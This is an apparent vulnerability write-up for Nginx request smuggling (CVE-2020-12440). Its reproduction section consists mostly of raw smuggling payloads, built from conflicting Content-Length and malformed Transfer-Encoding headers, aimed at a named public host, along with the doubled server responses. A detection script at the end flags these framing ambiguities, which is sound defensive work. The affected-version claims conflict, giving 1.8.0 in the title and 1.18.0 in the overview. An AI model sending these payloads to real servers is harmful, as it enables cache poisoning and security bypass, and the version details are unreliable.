# (CVE-2020-12440) Nginx <= 1.8.0 Request Smuggling

### 1. Vulnerability overview

A security vulnerability exists in Nginx 1.18.0 and earlier. An attacker can exploit it to poison caches, hijack credentials, or bypass security protections.

### 2. Affected versions

Nginx <= 1.8.0

### 3. Reproduction

#### Request

```bash
GET /test.html HTTP/1.1
Host: www.baud.com
Content-Length: 2

GET /poc.html HTTP/1.1
Host: www.baidu.com
Content-Length: 15
```

#### Response

```bash
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 33
Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT
Connection: keep-alive
ETag: "5eaae270-21"
Accept-Ranges: bytes

Test Page!

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 15
Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT
Connection: keep-alive
ETag: "5eaae23d-f"
Accept-Ranges: bytes

NGINX PoC File
```

#### Other examples

Request (200 OK + 405 Method Not Allowed)

```bash
GET / HTTP/1.1
Host: www.baidu.com
Content-Length: 4
Transfer-Encoding : chunked

46
TRACE / HTTP/1.1
Host:www.baidu.com
Content-Length:15

kk
0s
```

Response (200 OK + 405 Method Not Allowed)

```html
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes

Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.
For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.
Thank you for using nginx.

HTTP/1.1 405 Not Allowed
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 157
Connection: close

405 Not Allowed
```

Request (200 OK + 404 Not Found)

```bash
GET / HTTP/1.1
Host: www.baidu.com
Content-Length: 4
Transfer-Encoding : chunked

46
GET /404 HTTP/1.1
Host:www.baidu.com
Content-Length:15

kk
0s
```

Response (200 OK + 404 Not Found)

```html
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes

Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.
For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.
Thank you for using nginx.

HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive

404 Not Found
```
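
A detection-side check for the request shapes shown above, as an added example that is not part of the original page: it inspects one raw HTTP/1.1 request for the framing ambiguities those requests rely on. The function name `smuggling_indicators`, the host `example.test` and the sample byte strings are assumptions constructed for illustration.

```python
import re

# A request line such as b"GET /poc.html HTTP/1.1" at the start of a line.
REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]\r?$", re.M)

def smuggling_indicators(raw: bytes) -> list:
    """Return the reasons one raw HTTP/1.1 request is ambiguous to frame."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    findings, lengths, has_te = [], [], False
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("header line without a colon")
            continue
        if name != name.strip():
            # RFC 7230 section 3.2.4: no whitespace between name and colon.
            findings.append("whitespace in header name %r" % name.decode("latin-1"))
        key = name.strip().lower()
        if key == b"content-length":
            lengths.append(value.strip())
        elif key == b"transfer-encoding":
            has_te = True
    if len(set(lengths)) > 1:
        findings.append("conflicting Content-Length values")
    if lengths and has_te:
        # RFC 7230 section 3.3.3: two framings that can disagree on the body.
        findings.append("both Content-Length and Transfer-Encoding")
    declared = int(lengths[0]) if lengths and lengths[0].isdigit() else 0
    for m in REQUEST_LINE.finditer(rest):
        if m.start() != declared:   # not where the next request may begin
            findings.append("request line at body offset %d, declared length %d"
                            % (m.start(), declared))
    return findings

# Constructed samples shaped like the requests above (placeholder host).
CLEAN = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
CL_SHORT = (b"GET /test.html HTTP/1.1\r\nHost: example.test\r\nContent-Length: 2\r\n\r\n"
            b"GET /poc.html HTTP/1.1\r\nHost: example.test\r\nContent-Length: 15\r\n\r\n")
CL_TE = (b"GET / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 4\r\n"
         b"Transfer-Encoding : chunked\r\n\r\n46\r\nTRACE / HTTP/1.1\r\n"
         b"Host:example.test\r\nContent-Length:15\r\n\r\nkk\r\n0s\r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("cl-short", CL_SHORT), ("cl-te", CL_TE)):
        print(label, smuggling_indicators(sample))
```

In the `CL_TE` sample the `TRACE` line starts exactly at the declared Content-Length of 4, so the offset check stays silent and the two header checks are what flag it.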












